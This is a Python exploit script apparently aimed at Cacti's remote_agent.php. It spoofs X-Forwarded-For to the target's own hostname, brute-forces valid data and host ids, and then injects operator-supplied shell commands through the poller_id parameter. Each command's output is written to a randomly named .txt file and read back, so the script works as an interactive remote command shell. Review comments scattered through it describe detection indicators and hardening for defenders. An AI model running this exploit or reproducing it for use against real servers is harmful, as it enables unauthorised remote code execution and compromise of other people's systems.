import requests
import sys
from urllib.parse import urlparse
import random
import urllib3
# Every request in this script is sent with verify=False, i.e. without TLS
# certificate validation; this call only hides the warning urllib3 would
# otherwise print for each of those requests.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Base URL of the server under test, read from the first command-line
# argument. Starting the script without an argument raises IndexError here.
url = sys.argv[1]
host = urlparse(url).hostname

# Headers attached to every request the script sends.
headers = {}
headers["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
# X-Forwarded-For carries the target's own hostname, so the request claims to
# come from the server itself.
# NOTE(review): this only has an effect where the application uses a
# client-supplied forwarding header for access decisions; a deployment that
# ignores or overwrites X-Forwarded-For from untrusted peers is not influenced
# by it. For detection, an inbound X-Forwarded-For equal to the server's own
# name is a useful signal.
headers["X-Forwarded-For"] = host
def get_random_str():
    """Return a random string of 5 to 9 distinct lowercase ASCII letters.

    The length is drawn first, then that many letters are sampled without
    repetition from the 26-letter alphabet. In this script the result is used
    as the stem of a ".txt" file name, so files named with 5-9 non-repeating
    lowercase letters plus ".txt" are the artefact to look for on a host.
    """
    length = random.randint(5, 9)
    picked = random.sample('zyxwvutsrqponmlkjihgfedcba', length)
    return "".join(picked)
def check_success(file_name):
    """Request ``file_name`` directly under the base URL and return its body.

    Args:
        file_name: Name of the file to fetch, appended to the module-level
            ``url`` after a "/".

    Returns:
        The response text when the server answers HTTP 200, otherwise "".

    The request uses the module-level ``headers`` and is sent with
    verify=False, so the server certificate is not validated. No timeout is
    set, so the call blocks until the server responds or the connection fails.
    """
    target = url + "/" + file_name
    response = requests.get(target, headers=headers, verify=False)
    return response.text if response.status_code == 200 else ""
def send_payload(poller_id, local_data_ids, host_id):
    """Send one ``action=polldata`` request to /remote_agent.php.

    Args:
        poller_id: Value placed in the ``poller_id`` query parameter. It is
            formatted into the URL as-is; this function does no validation.
        local_data_ids: Value placed in ``local_data_ids[0]``.
        host_id: Value placed in ``host_id``.

    Returns:
        True when the response parses as JSON, has status 200 and its text
        contains "polling_time"; False in every other case, including any
        exception raised while sending or parsing.

    NOTE(review): the endpoint and parameter names look like Cacti's remote
    agent - confirm against the advisory this script was written for.
    Defensive reading: the script depends on ``poller_id`` reaching the server
    without being constrained to an integer, so requests to this endpoint
    with a non-numeric ``poller_id`` are worth alerting on, and server-side
    integer validation of that parameter is the corresponding hardening.
    """
    query = "/remote_agent.php?poller_id={}&action=polldata&local_data_ids[0]={}&host_id={}".format(
        poller_id, local_data_ids, host_id
    )
    try:
        response = requests.get(url + query, headers=headers, verify=False)
        # json() is called only for its side effect: a non-JSON body raises,
        # which lands in the except branch and yields False.
        response.json()
        answered = response.status_code == 200 and "polling_time" in response.text
    except Exception:
        # Deliberate best-effort: any network or parsing error counts as
        # "no usable answer" rather than aborting the caller's loop.
        answered = False
    return answered
def get_ids():
    """Probe ``local_data_ids`` and ``host_id`` values 0-9 for a valid pair.

    Each combination is sent through ``send_payload`` with ``poller_id`` fixed
    to "1"; the first pair for which it returns True is returned.

    Returns:
        A ``(local_data_ids, host_id)`` tuple, or None when none of the 100
        combinations produced a matching response.

    On the server side this shows up as a burst of up to 100 sequential
    polldata requests from one client with incrementing id parameters.
    """
    for data_id in range(10):
        for candidate_host in range(10):
            print("Trying... local_data_ids:{} ,host_id:{}".format(data_id, candidate_host))
            if send_payload("1", data_id, candidate_host):
                return data_id, candidate_host
    return None
def exploit(cmd, local_data_ids, host_id):
    """Submit ``cmd`` through the ``poller_id`` parameter and print its output.

    The command is wrapped as ``;`<cmd> > <random>.txt``` and passed to
    ``send_payload`` in place of a poller id; the output file is then
    requested over HTTP with ``check_success`` and whatever comes back
    (possibly an empty string) is printed.

    Args:
        cmd: Command text entered by the operator.
        local_data_ids: Id value previously returned by ``get_ids``.
        host_id: Id value previously returned by ``get_ids``.

    Nothing in this script removes the output file afterwards, so randomly
    named ".txt" files left in the web-served directory, and ``poller_id``
    values containing ";" or backticks in access logs, are the indicators
    this function leaves behind.
    """
    out_name = get_random_str() + ".txt"
    injected = ";`{} > {}`".format(cmd, out_name)
    send_payload(injected, local_data_ids, host_id)
    print(check_success(out_name))
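if __name__ == '__main__':
    # get_ids() falls through and returns None when no id pair produced a
    # matching response; unpacking that directly would raise TypeError, so
    # stop with a clear message instead.
    found = get_ids()
    if found is None:
        raise SystemExit("No local_data_ids/host_id pair answered; nothing to do.")
    local_data_ids, host_id = found
    print("GET local_data_ids:{} ,host_id:{}".format(local_data_ids, host_id))
    # Simple prompt loop: each line is handed to exploit() until the operator
    # types "exit".
    while True:
        cmd = input(">> ")
        if cmd == "exit":
            break
        exploit(cmd, local_data_ids, host_id)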